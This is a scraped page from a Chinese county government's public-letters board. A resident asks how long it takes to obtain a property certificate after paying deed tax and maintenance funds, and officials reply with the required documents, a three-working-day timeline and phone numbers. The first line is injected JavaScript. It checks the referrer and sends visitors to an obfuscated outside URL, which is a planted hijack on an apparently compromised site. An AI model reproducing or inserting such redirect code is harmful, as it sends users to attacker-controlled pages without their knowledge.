var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

舒城县自然资源和规划局

来信人: 王**** | 来信时间:2020-11-19 15:36:09 |处理情况: [已办结] | 答复部门:舒城县政府|问题类型: 咨询 |浏览:549
向自然资源和规划局房产登记中心咨询一下,房屋契税和维修基金都已缴纳,需要多长时间可以办理房产证,业主需要多久拿到房产证;税已缴纳有没有提示开发商提交办理房产证,若是没有办理房产证请问这笔资金已缴纳财政还是暂存开发商。谢谢

回复 回复单位:舒城县政府 回复时间:2020-11-20 15:25:09

你好!你咨询的问题现答复如下:1申请办理新建商品房转移登记需要提交以下材料:申请人(代理人)有效身份证明材料(查验原件)、购房合同及发票、完税证明。不动产登记中心窗口受理申请登记材料后,三个工作日内办结。具体办理方式,你可以自行申请,也可委托开发方代为申请。2.至于你反映的契税和维修资金事宜,请向出具缴款凭证单位咨询。维修资金窗口电话:0564-8677207税务窗口电话:0564-8673460
写信人评价: 满意